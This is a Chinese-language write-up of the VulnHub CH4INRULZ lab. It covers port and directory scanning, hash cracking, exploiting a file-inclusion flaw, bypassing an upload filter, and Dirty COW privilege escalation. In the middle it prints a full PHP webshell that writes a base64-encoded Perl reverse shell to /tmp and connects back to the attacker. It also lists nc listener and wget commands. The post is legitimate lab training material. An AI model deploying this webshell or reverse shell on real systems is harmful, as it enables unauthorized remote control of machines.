最新文章见我个人博客:点此

靶机环境下载地址:[下载]
ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247/)
好久没有来做内网渗透了,碰巧遇到一个新鲜点的靶场,就来试一下。

kali:192.168.0.100
靶机: 192.168.0.101
先扫一下端口

nmap -sS -A -p- 192.168.0.101

开启了ftp,ssh,http服务,打开他的网址上去一看,是一个未完成的个人博客。在他的网站上并没有找到什么线索,url也没有什么奇特的地方,下面用破壳或者dirsearch扫一下他的目录。

发现一个需要登录的子页面development和index.html.bak网页备份文件。其他均缺少有效信息。

查看首页备份文件发现里面竟然有一串hash,把他保存到pass.txt用john破解一下

john pass.txt > res.log

如果res.log中不显示结果,加上–show参数即可

得到密码-- frank!!!
这个密码正好可以登录development中的东西,(frank, frank!!!)。登录进去根据提示进入uploader子目录,是一个文件上传,因为它做了50%的过滤规则,因此我们看看是否存在文件包含漏洞。

想起前面还扫到了一个8011端口的http服务,再扫一下这个的目录,只扫出来了一个api的子页面

经过试验只有files_api.php可以访问。

根据他写的这句话,应该是有文件包含,而且是file传参
先尝试下GET传参,

?file=/etc/passwd

提示WRONG INPUT!
尝试POST传参,可以查看了,并发现确实有一个用户名为frank。但无法进一步查看shadow,或许是权限比较低。
至少证明确实是存在文件包含
当然我们可以利用伪协议查看它的过滤规则

?file=php://filter/convert.base64-encode/resource=files_api.php

到此基本思路已经明了,通过文件上传漏洞上传一句话木马,利用文件包含进行反弹shell或尝试蚁剑连接。
修改文件后缀为jpg,MIME修改为image/jpeg,添加文件头GIF98即可轻松绕过(注意下列代码需要修改ip和port)

<?php
function which($pr) {$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {$res = '';
if ($cfe) {if(function_exists('exec')) {@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {$res = @shell_exec($cfe);
} elseif(function_exists('system')) {@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {$res = '';
while(!@feof($f)) {$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){if($fp=@fopen($fname,'w')) {@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "19.168.0.100";                    # 修改为你的攻击机的ip
$yourport = '7890';                          # 修改为攻击机的监听端口
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

上传成功后提示我们在我们自己的路径下,访问uploader下的FRANKuploads确实有我们刚刚上传的shell.jpg

接着kali里nc监听

nc -lvp 7890

利用文件包含以php访问这个shell.jpg,kali中发现上线。使用python建立虚拟终端

uname -a 看一下系统内核,是2.6,直接脏牛提权。

searchsploit Dirty

其中40838似乎不太好用(?),总之不行就换一个试试呗,我这里用的是40839

cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/crack.c

需要将这个c文件传输到靶机上,可以通过python开启一个建议的http服务,利用wget将其下载下来(因为权限问题似乎只能下在tmp文件夹)。

# 攻击机:
cd /root
python -m SimpleHTTPServer 80# 目标靶机:
cd /tmp
wget http://192.168.0.100/crack.c
gcc -pthread crack.c -o crack -lcrypt
./crack

让我们输入新建用户的密码,随便输个123,然后就成功创建了一个叫做firefart的用户

断开nc重新连接一下就可以直接su到firefart了。

firefart其实就已经是root了,直接查看root目录下的root.txt拿到这道题唯一的flag,整个渗透过程完毕。

靶场渗透CH4INRULZ_v1.0.1相关推荐

  1. Vulnhub靶场渗透-CH4INRULZ_v1.0.1

    前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3 ...

  2. VulnHub靶场之CH4INRULZ_v1.0.1

    下载地址:http%3A//download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 主机发现 netdiscover -i eth0 -r 192.16 ...

  3. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  4. 西域大都护府 第四期cfs靶场 渗透记录

    西域大都护府 第四期cfs靶场 渗透记录 1.DEDECMS 2.二层探测+转发 2.1 tomcat 2.2 shiro 2.3 weblogic 3.第三层 3.1 mysql 3.2 Smb 官 ...

  5. planet_Earth靶场渗透记录

    planet_Earth 靶场渗透记录 一.线索资料 1.拿到靶机IP 还从一个逗比那里学了一招,windows中cmd arp -a //也可以拿到靶机IP,前提是两者有交互 A B Kali ? ...

  6. 小白渗透0-1:BlackMarket靶场渗透记录

    小白渗透0-1:BlackMarket靶场渗透记录 #环境 攻击机:kali 192.168.200.129 靶 机:BlackMarket 链接:https://pan.baidu.com/s/1S ...

  7. Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

    Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...

  8. DeathNote 靶场渗透记录

    DeathNote 靶场渗透记录 一.ip 1.攻击机:Kali ip:192.168.142.128 ​ 靶机:? ip:192.168.56.138 二.日常扫端口 开放端口 22 和 80 ,老 ...

  9. CTF综合靶场渗透系列-Billu_b0x

    Billu_b0x 文章目录 Billu_b0x 前言 目标 运行环境 信息收集 漏洞挖掘 测试首页SQL注入 利用文件包含漏洞获取php源码.passwd文件 通过得到的mysql密码登录phpmy ...

最新文章

  1. 《计算机网络应用基础》模拟试卷(六),《计算机与网络应用基础知识1》模拟试卷...
  2. win7下面安装mongo步骤(开发环境为pycharm)
  3. 新版上线时发现的数据库优化问题
  4. caffe框架下目标检测——faster-rcnn实战篇操作
  5. 腾讯 PB 级大数据计算如何做到秒级?
  6. [剑指offer]面试题第[55-2]题[Leetcode][第110题][JAVA][平衡二叉树][DFS][剪枝]
  7. 07 行锁功过:怎么减少行锁对性能的影响? (笔记)
  8. 20135310陈巧然家庭作业汇总[3.56 3.67 6.23 6.39.6.40 6.41]
  9. Mysql的数据库和客户端环境搭建(三)
  10. pyspark.sql写入mysql_将pyspark dataframe写入MySQL数据库时出错
  11. Emoji表情符号在MySQL数据库中的存储
  12. javascript中的继承[二] 基于构造函数(《Object-Oriented JavaScript》第六章)
  13. java web实训任务书,课程设计任务书模板-《JavaWeb程序设计》.doc
  14. reg类型变量综合电路_Verilog中 reg和wire 用法和区别以及always和assign的区别
  15. 棋牌漏洞游戏反汇编译破解修改透视案例分析
  16. Django6:应用及分布式路由
  17. Android 开发学习笔记:七大知识点板块汇总
  18. Android触控基础:MotionEvent
  19. php怎么获取html span标签的值_如何获取PHP中所有html元素的列表?
  20. Scapy畸形报文攻击

热门文章

  1. 电脑代码查询四级准考证
  2. MySQL教程四——集合运算
  3. HP M1005可以扫描打印没反应的处理方法
  4. SpringCloud微架构-李兴华-专题视频课程
  5. Photoshop设计网页布局
  6. 算法与数据结构技术书籍从入门到进阶推荐适合大神小白附技术书阅读方法论【附网盘链接】
  7. XML File format error
  8. 编写一个python程序用来计算投资回收期_智慧职教云课堂Python程序设计基础(九江职业技术学院)题目答案...
  9. 阿里达摩院预测2022十大科技趋势,有几分靠谱?
  10. 最新前端开发面试笔试题及答案---图片(面试题系列持续更新中)(3)